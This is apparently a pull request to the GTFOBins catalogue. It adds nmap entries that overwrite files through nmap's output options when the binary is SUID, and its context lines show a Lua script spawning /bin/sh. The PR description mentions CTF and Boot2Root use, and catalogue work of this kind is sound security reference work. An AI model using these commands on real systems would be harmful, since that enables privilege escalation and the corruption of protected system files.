### PR TITLE
Over-writing files using Nmap's SUID with Nmap's output

### DIFF
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -108,4 +108,9 @@ functions:
         TF=$(mktemp)
         echo 'os.execute("/bin/sh")' > $TF
         ./nmap --script=$TF
+    - description: This will over-write files with nmap output, use with caution.
+      code: |
+        sudo touch /etc/filecantbetouched
+        nmap 127.0.0.1 -oN=/etc/filecantbetouched
+        cat /etc/filecantbetouched
 ---

--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -87,6 +87,10 @@ functions:
         TF=$(mktemp)
         echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
         nmap --script=$TF
+    - description: The payload appears inside the regular nmap output.
+      code: |
+        LFILE=file_to_write
+        nmap -oG=$LFILE DATA
   file-read:
     - code: |
         TF=$(mktemp)
@@ -108,9 +112,9 @@ functions:
         TF=$(mktemp)
         echo 'os.execute("/bin/sh")' > $TF
         ./nmap --script=$TF
-    - description: This will over-write files with nmap output, use with caution.
+  suid:
+    - description: The payload appears inside the regular nmap output.
       code: |
-        sudo touch /etc/filecantbetouched
-        nmap 127.0.0.1 -oN=/etc/filecantbetouched
-        cat /etc/filecantbetouched
+        LFILE=file_to_write
+        ./nmap -oG=$LFILE DATA
 ---


### PR DESCRIPTION
I came across this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed  (Does the latest version of Nmap no longer allows invoking binaries in the context of the user with which the SUID bit was set on the binary? ) but this worked. 

Could be enough to demonstrate effect of using SUID on Nmap. Not enough while doing a CTF/Boot2Root.

I've yet to come up with a way to overwrite the contents of the system file according to what we want, with this we can only **over-write files with nmap output**.

```bash
sudo touch /etc/filecantbetouched
nmap 127.0.0.1 -oN=/etc/filecantbetouched
cat /etc/filecantbetouched
```